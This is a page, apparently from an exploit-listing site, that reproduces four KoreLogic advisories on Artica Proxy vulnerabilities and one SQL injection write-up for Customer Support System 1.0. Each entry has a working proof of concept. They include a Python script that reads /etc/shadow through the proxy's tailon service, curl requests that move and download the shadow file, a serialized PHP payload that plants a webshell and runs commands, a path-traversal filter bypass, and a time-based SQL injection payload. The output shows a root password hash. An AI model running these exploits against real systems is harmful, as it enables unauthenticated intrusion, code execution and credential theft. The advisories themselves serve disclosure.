Latest exploits :: CodePwn

<pre><code>KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible Unauthenticated Title: Artica Proxy Loopback Services Remotely Accessible Unauthenticated Advisory ID: KL-001-2024-004 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affected Version: 4.50 Platform: Debian 10 LTS CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel, CWE-552: Files or Directories Accessible to External Parties CVE ID: CVE-2024-2056 2. Vulnerability Description Services that are running and bound to the loopback interface on the Artica Proxy are accessible through the proxy service. In particular, the "tailon" service is running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Security issues associated with exposing this network service are documented at https://github.com/gvalkov/tailon#security. Using the tailon service, the contents of any file on the Artica Proxy can be viewed. 3. Technical Description root@artica-450:~# netstat -anop | grep LIST | egrep '127.0.|::' | awk '{ print $4 " " $7 }' 127.0.0.1:57585 <PID>/(squid-1) 127.0.0.1:8562 <PID>/nginx: 127.0.0.1:884 <PID>/sshd 127.0.0.55:53 <PID>/dnscache 127.0.0.1:9143 <PID>/[authlog] 127.0.0.1:5432 <PID>/postgres 127.0.0.1:2521 <PID>/artica-smtpd 127.0.0.1:2874 <PID>/monit 127.0.0.1:19102 <PID>/[cache-tail] 127.0.0.1:3333 <PID>/go-shield-serv 127.0.0.1:389 <PID>/slapd 127.0.0.1:3334 <PID>/go-exec 127.0.0.1:7050 <PID>/tailon :::4949 <PID>/perl :::9025 <PID>/[error-page] root@artica-450:~# ps -efww | grep tailon root 2765 1 0 Nov07 ? 00:01:29 /sbin/tailon --allow-download --config /etc/tailon/config.toml alias=Syslog,group=System,/var/log/syslog alias=Daemons,group=Services,/var/log/*.log alias=Proxy,group=Service-Proxy,/var/log/squid/*.log alias=Nginx,group=Service-Web,/var/log/nginx/*.log 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Jim Becher and Jaggar Henry of KoreLogic, Inc. 6. Disclosure Timeline 2023.12.18 - KoreLogic requests vulnerability contact and secure communication method from Artica. 2023.12.18 - Artica Support issues automated ticket #1703011342 promising follow-up from a human. 2024.01.10 - KoreLogic again requests vulnerability contact and secure communication method from Artica. 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!" 2024.01.11 - KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form. 2024.01.23 - KoreLogic requests CVE from MITRE. 2024.01.23 - MITRE issues automated ticket #1591692 promising follow-up from a human. 2024.02.01 - 30 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.06 - KoreLogic requests update on CVE from MITRE. 2024.02.15 - KoreLogic requests update on CVE from MITRE. 2024.02.22 - KoreLogic reaches out to alternate CNA for CVE identifiers. 2024.02.26 - 45 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.29 - Vulnerability details presented to AHA! (takeonme.org) by proxy. 2024.03.01 - AHA! issues CVE-2024-2056 to track this vulnerability. 2024.03.05 - KoreLogic public disclosure. 7. Proof of Concept $ python3 exploit.py 192.168.2.139 /etc/shadow 1701282189.746 35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 - mac=\\\"e0:d5:5e:0a:d3:24\\\" category:%200%0D%0Acategory-name:%20Unknown%0D%0Aclog:%20cinfo:0-Unknown;%0D%0A exterr=\\\"-|-\\\" root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7::: daemon:*:19507:0:99999:7::: bin:*:19507:0:99999:7::: sys:*:19507:0:99999:7::: sync:*:19507:0:99999:7::: games:*:19507:0:99999:7::: man:*:19507:0:99999:7::: ... ... ### exploit.py import re import sys import json import websocket """ run `pip install websocket-client` before executing. """ ARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '172.17.0.1' FILE_TO_READ = sys.argv[2] if len(sys.argv) >= 3 else '/etc/passwd' WEBSOCKET_URI = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket' payload = { 'command': 'sed', 'script': f'r {FILE_TO_READ}', 'entry': { 'path': '/var/log/squid/access.log', 'alias': 'Proxy/access.log', }, 'nlines': 1 } websocket_message = json.dumps([json.dumps(payload)]) ws = websocket.WebSocket() ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='8085', proxy_type='http') ws.send(websocket_message) reading = True while reading: data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv()) if data: print(data.group(1)) ws.close() The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>

<pre><code>KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability Title: Artica Proxy Unauthenticated File Manager Vulnerability Advisory ID: KL-001-2024-003 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affected Version: 4.40 and 4.50 Platform: Debian 10 LTS CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel, CWE-552: Files or Directories Accessible to External Parties CVE ID: CVE-2024-2055 2. Vulnerability Description The "Rich Filemanager" feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. 3. Technical Description The Artica Proxy can be installed with a small amount of "Features" enabled. Within the administrative web interface, additional features can be installed, enabled, and disabled. The "Rich Filemanager" feature is disabled by default. Enabling this feature will spawn a listener on port 5000/tcp bound to 0.0.0.0. By default, when this feature is enabled, authentication is not required to access the web interface. The "Rich Filemanager" runs as the root user. This provides an unauthenticated attacker complete access to the file system. root@artica:~# ps -efww | grep -i File root 1888 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER root 1889 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER This can be exploited by an attacker to add entries in to /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create an additional root-level account that has the ability to SSH in to the system. 4. Mitigation and Remediation Recommendation No response from vendor. Rich Filemanager feature is disabled by default. Leave it that way. 5. Credit This vulnerability was discovered by Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2023.12.18 - KoreLogic requests vulnerability contact and secure communication method from Artica. 2023.12.18 - Artica Support issues automated ticket #1703011342 promising follow-up from a human. 2024.01.10 - KoreLogic again requests vulnerability contact and secure communication method from Artica. 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!" 2024.01.11 - KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form. 2024.01.23 - KoreLogic requests CVE from MITRE. 2024.01.23 - MITRE issues automated ticket #1591692 promising follow-up from a human. 2024.02.01 - 30 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.06 - KoreLogic requests update on CVE from MITRE. 2024.02.15 - KoreLogic requests update on CVE from MITRE. 2024.02.22 - KoreLogic reaches out to alternate CNA for CVE identifiers. 2024.02.26 - 45 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.29 - Vulnerability details presented to AHA! (takeonme.org) by proxy. 2024.03.01 - AHA! issues CVE-2024-2055 to track this vulnerability. 2024.03.05 - KoreLogic public disclosure. 7. Proof of Concept Step 1: Move /etc/shadow to /tmp/shadow $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198' {"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}} Step 2: Download /tmp/shadow $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870' root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7::: daemon:*:19507:0:99999:7::: bin:*:19507:0:99999:7::: sys:*:19507:0:99999:7::: sync:*:19507:0:99999:7::: games:*:19507:0:99999:7::: man:*:19507:0:99999:7::: lp:*:19507:0:99999:7::: mail:*:19507:0:99999:7::: news:*:19507:0:99999:7::: uucp:*:19507:0:99999:7::: proxy:*:19507:0:99999:7::: www-data:*:19507:0:99999:7::: backup:*:19507:0:99999:7::: list:*:19507:0:99999:7::: irc:*:19507:0:99999:7::: gnats:*:19507:0:99999:7::: nobody:*:19507:0:99999:7::: _apt:*:19507:0:99999:7::: systemd-timesync:*:19507:0:99999:7::: systemd-network:*:19507:0:99999:7::: systemd-resolve:*:19507:0:99999:7::: messagebus:*:19507:0:99999:7::: quagga:*:19507:0:99999:7::: apt-mirror:*:19507:0:99999:7::: privoxy:*:19507:0:99999:7::: ntp:*:19507:0:99999:7::: redsocks:!:19507:0:99999:7::: prads:*:19507:0:99999:7::: freerad:*:19507:0:99999:7::: vnstat:*:19507:0:99999:7::: stunnel4:!:19507:0:99999:7::: sshd:*:19507:0:99999:7::: vde2-net:*:19507:0:99999:7::: memcache:!:19507:0:99999:7::: davfs2:*:19507:0:99999:7::: ziproxy:!:19507:0:99999:7::: proftpd:!:19507:0:99999:7::: ftp:*:19507:0:99999:7::: mosquitto:*:19507:0:99999:7::: openldap:!:19507:0:99999:7::: munin:*:19507:0:99999:7::: msmtp:*:19507:0:99999:7::: Debian-snmp:!:19507:0:99999:7::: opendkim:*:19507:0:99999:7::: avahi:*:19507:0:99999:7::: glances:*:19507:0:99999:7::: ArticaStats:!:19507:0:99999:7::: netdata:!:19507:0:99999:7::: mysql:!:19507:0:99999:7::: postfix:!:19507:0:99999:7::: squid:!:19507:0:99999:7::: smokeping:!:19507:0:99999:7::: unbound:!:19645:0:99999:7::: Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208' {"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}} The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>

<pre><code>KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability Advisory ID: KL-001-2024-002 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affected Version: 4.50 Platform: Debian 10 LTS CWE Classification: CWE-502 Deserialization of Untrusted Data CVE ID: CVE-2024-2054 2. Vulnerability Description The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. 3. Technical Description Prior to authentication, a user can send an HTTP request to the "/wizard/wiz.wizard.progress.php" endpoint. This endpoint processes the "build-js" query parameter by base64 decoding the provided value and then calling the "unserialize" PHP function with the decoded value as input. Code snippet from "wiz.wizard.progress.php": if(isset($_GET["build-js"])){buildjs();exit;} ... $ARRAY=unserialize(base64_decode($_GET["build-js"])); To exploit this vulnerability, a user can leverage the installed "Net_DNS2" library autoloader to instantiate the "Net_DNS2_Cache_File" class. The "__destruct" method within this class will write to arbitrary files defined by the class: public function __destruct() { // // if there's no cache file set, then there's nothing to do // if (strlen($this->cache_file) == 0) { return; } // // open the file for reading/writing // $fp = fopen($this->cache_file, 'a+'); if ($fp !== false) { ... if (!is_null($data)) { // // write the file contents // fwrite($fp, $data); } An unauthenticated user can overwrite existing files and insert a webshell to execute malicious PHP as the "www-data" user. 4. Mitigation and Remediation Recommendation No response from vendor. This vulnerability can be remediated by deleting the 'usr/share/artica-postfix/wizard' directory if it is not needed. Otherwise, move it to a location outside of the web root. 5. Credit This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc. 6. Disclosure Timeline 2023.12.18 - KoreLogic requests vulnerability contact and secure communication method from Artica. 2023.12.18 - Artica Support issues automated ticket #1703011342 promising follow-up from a human. 2024.01.10 - KoreLogic again requests vulnerability contact and secure communication method from Artica. 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!" 2024.01.11 - KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form. 2024.01.23 - KoreLogic requests CVE from MITRE. 2024.01.23 - MITRE issues automated ticket #1591692 promising follow-up from a human. 2024.02.01 - 30 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.06 - KoreLogic requests update on CVE from MITRE. 2024.02.15 - KoreLogic requests update on CVE from MITRE. 2024.02.22 - KoreLogic reaches out to alternate CNA for CVE identifiers. 2024.02.26 - 45 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.29 - Vulnerability details presented to AHA! (takeonme.org) by proxy. 2024.03.01 - AHA! issues CVE-2024-2054 to track this vulnerability. 2024.03.05 - KoreLogic public disclosure. 7. Proof of Concept To overwrite the "wiz.upload.php" file to contain a PHP webshell, the following serialized object can be base64 encoded and submitted via the "build-js" query parameter: O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}} $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k "$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" && curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD"; {"uid=33(www-data) gid=33(www-data) groups=33(www-data) ":{"cache_date":1696883506,"ttl":8303116493}} The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>

<pre><code>KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability Title: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability Advisory ID: KL-001-2024-001 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affected Version: 4.40 and 4.50 Platform: Debian 10 LTS CWE Classification: CWE-23: Relative Path Traversal CVE ID: CVE-2024-2053 2. Vulnerability Description The Artica Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user. 3. Technical Description Prior to authentication, a user can send an HTTP request to the "images.listener.php" endpoint. This endpoint processes the "mailattach" query parameter and concatonates the user supplied value to the "/opt/artica/share/www/attachments/" file path. The contents of the file located at the newly created path is returned in the HTTP response body. The "images.listener.php" endpoint attempts to prevent a local file inclusion vulnerability by stripping strings that attempt to traverse into the parent directory from the user supplied "mailattach" value: $_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]); $_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]); $_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]); $_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]); $_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]); $_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]); $file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}"; header("Content-type: application/force-download" ); header("Content-Disposition: attachment; \ filename=\"{$_GET["mailattach"]}\""); header("Content-Length: ".filesize($file)."" ); header("Expires: 0" ); readfile($file); If effective, this approach would limit files accessible by this endpoint to those within the "/opt/artica/share/www/attachments/" directory. Unfortunately, the removal of the "../" string is only performed once, so the resulting file path is not checked. By using the path "..././foo.txt", the "images.listener.php" endpoint removes the "../" string resulting in "../foo.txt" - a relative file path to traverse to the parent directory. The strings "/etc/" and "passwd" are also stripped from the file path as many methods of detecting a path traversal vulnerability rely on fetching the "/etc/passwd" file. By inserting these strings into specific locations, a user suppplied "mailattach" value such as "/epasswdtc/ppasswdasswd" is transformed into "/etc/passwd", bypassing the protection entirely. An unauthenticated user can leverage this endpoint to read files on the system, according to the privileges of the "www-data" user. 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc. 6. Disclosure Timeline 2023.12.18 - KoreLogic requests vulnerability contact and secure communication method from Artica. 2023.12.18 - Artica Support issues automated ticket #1703011342 promising follow-up from a human. 2024.01.10 - KoreLogic again requests vulnerability contact and secure communication method from Artica. 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!" 2024.01.11 - KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form. 2024.01.23 - KoreLogic requests CVE from MITRE. 2024.01.23 - MITRE issues automated ticket #1591692 promising follow-up from a human. 2024.02.01 - 30 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.06 - KoreLogic requests update on CVE from MITRE. 2024.02.15 - KoreLogic requests update on CVE from MITRE. 2024.02.22 - KoreLogic reaches out to alternate CNA for CVE identifiers. 2024.02.26 - 45 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.29 - Vulnerability details presented to AHA! (takeonme.org) by proxy. 2024.03.01 - AHA! issues CVE-2024-2053 to track this vulnerability. 2024.03.05 - KoreLogic public disclosure. 7. Proof of Concept $ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin ntp:x:109:117::/nonexistent:/usr/sbin/nologin redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin prads:x:111:120::/home/prads:/usr/sbin/nologin freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin sshd:x:115:65534::/run/sshd:/usr/sbin/nologin vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin Debian-snmp:x:126:132::/var/lib/snmp:/bin/false opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin glances:x:129:135::/var/lib/glances:/usr/sbin/nologin ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh netdata:x:1001:1002:netdata:/home/netdata:/bin/bash postfix:x:1002:1001::/home/postfix:/bin/sh ... ... The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>

<pre><code># Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities # Date: 15/12/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-50071 *Description*: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.*Payload*: '+(select*from(select(sleep(20)))a)+' *Steps to reproduce*: 1- Log in to the application. 2- Navigate to the page /customer_support/index.php?page=new_ticket. 3- Create a new ticket and insert a malicious payload into one of the following parameters: department_id, customer_id, or subject. *Request:* POST /customer_support/ajax.php?action=save_ticket HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835 Content-Length: 853 Origin: http://192.168.68.148 Connection: close Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="id" -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="subject" teste'+(select*from(select(sleep(5)))a)+' -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="customer_id" 3 -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="department_id" 4 -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="description" Blahs -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------81419250823331111993422505835-- </code></pre>